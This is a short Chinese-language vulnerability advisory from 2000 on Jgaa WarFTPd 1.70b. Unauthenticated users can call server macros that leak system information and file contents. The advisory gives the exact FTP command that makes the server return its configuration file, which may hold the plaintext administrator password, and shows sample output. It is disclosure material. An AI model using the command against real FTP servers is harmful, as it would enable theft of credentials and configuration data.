发布日期：2000-01-07
更新日期：2000-01-07

受影响系统：

Jgaa WarFTPd 1.70b
+Windows NT/95/98

描述：

---

WarFTPd包含很多宏用来帮助进行一个复杂的ftp站点的设置.
然而,即使是一个未经认证的用户也可以远程调用这些宏,有些宏能泄漏服务器和操作系统
的信息,也能被用来在返回的错误信息中获取文件内容,甚至包括WarFTP的配置文件,里面可
能包含纯文本方式保存的管理员口令.



<* 来源:    Sir Dystic of the cDc (sd@sinister.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

ftp连接到目标主机,执行"literal [warsvr.conf]"
得到结果:
500 '[Options]
core_RESNAME=WARSVR
core_RPCPORT=0
core_PRIORITY=2
core_TRAYICON=1
core_WM_CLOSE=1
log_LOGFILE=Log/%Y-%m-%d.log
... etc
': command not understood.

建议：

---

暂无

浏览次数：6858
严重程度：0（网友投票）